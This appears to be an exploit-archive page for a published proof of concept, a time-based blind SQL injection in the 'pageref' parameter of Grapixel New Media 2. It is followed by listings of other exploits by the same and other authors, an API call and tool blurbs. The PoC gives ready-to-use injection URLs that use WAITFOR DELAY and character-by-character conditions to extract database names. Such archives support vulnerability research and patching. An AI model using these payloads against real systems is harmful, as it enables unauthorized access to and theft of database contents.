Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"Grapixel New Media 2 - 'pageref' SQL Injection"

Author

Exploit author

"Berk Dusunur"

Platform

Exploit platform

php

Release date

Exploit published date

2018-10-29

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Web App
# Date: 2018-10-26
# Vendor Homepage: http://www.grapixel.com
# Software Link: http://www.grapixel.com
# Affected Version: v2
# Tested on: MacosX
# CVE : N/A

#Proof Of Concept
# Time-Based sql injection is called a data extraction event with request response times 
# with the server when there is no other way for it to extract aggressive data. It should 
# be determined by sql injection type. I discovered blind time-based sql injection. 
# Because single quotes didn't break the page structure, so I tried to get results 
# using waitfor delay instead.

http://target/pages.aspx?pageref=[SQL]
http://target/pages.aspx?pageref=' waitfor delay '00:00:05'--;
http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>80) WAITFOR DELAY '0:0:5'--
http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>81) WAITFOR DELAY '0:0:5'--

Ascii equivalent of 80,81 figures The first database, wait 5 seconds if the first letter is "p"
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-05-28 "NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection" webapps multiple "Berk Dusunur"
2020-05-28 "Online-Exam-System 2015 - 'fid' SQL Injection" webapps php "Berk Dusunur"
2020-01-29 "Liferay CE Portal 6.0.2 - Remote Command Execution" webapps java "Berk Dusunur"
2018-10-29 "Grapixel New Media 2 - 'pageref' SQL Injection" webapps php "Berk Dusunur"
2018-08-23 "PCViewer vt1000 - Directory Traversal" webapps windows "Berk Dusunur"
2018-07-23 "Synology DiskStation Manager 4.1 - Directory Traversal" webapps linux "Berk Dusunur"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-16 "WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-07-10 "WolfSight CMS 3.2 - SQL Injection" webapps php "Berk Dusunur"
2018-06-28 "hycus CMS 1.0.4 - Authentication Bypass" webapps php "Berk Dusunur"
2018-06-22 "phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)" webapps php "Berk Dusunur"
2018-06-20 "NewMark CMS 2.1 - 'sec_id' SQL Injection" webapps linux "Berk Dusunur"
2018-06-18 "Redatam Web Server < 7 - Directory Traversal" webapps windows "Berk Dusunur"
2018-05-21 "Zenar Content Management System - Cross-Site Scripting" webapps php "Berk Dusunur"
2018-05-18 "Monstra CMS < 3.0.4 - Cross-Site Scripting (2)" webapps php "Berk Dusunur"
2018-03-26 "Acrolinx Server < 5.2.5 - Directory Traversal" remote windows "Berk Dusunur"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/45704/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.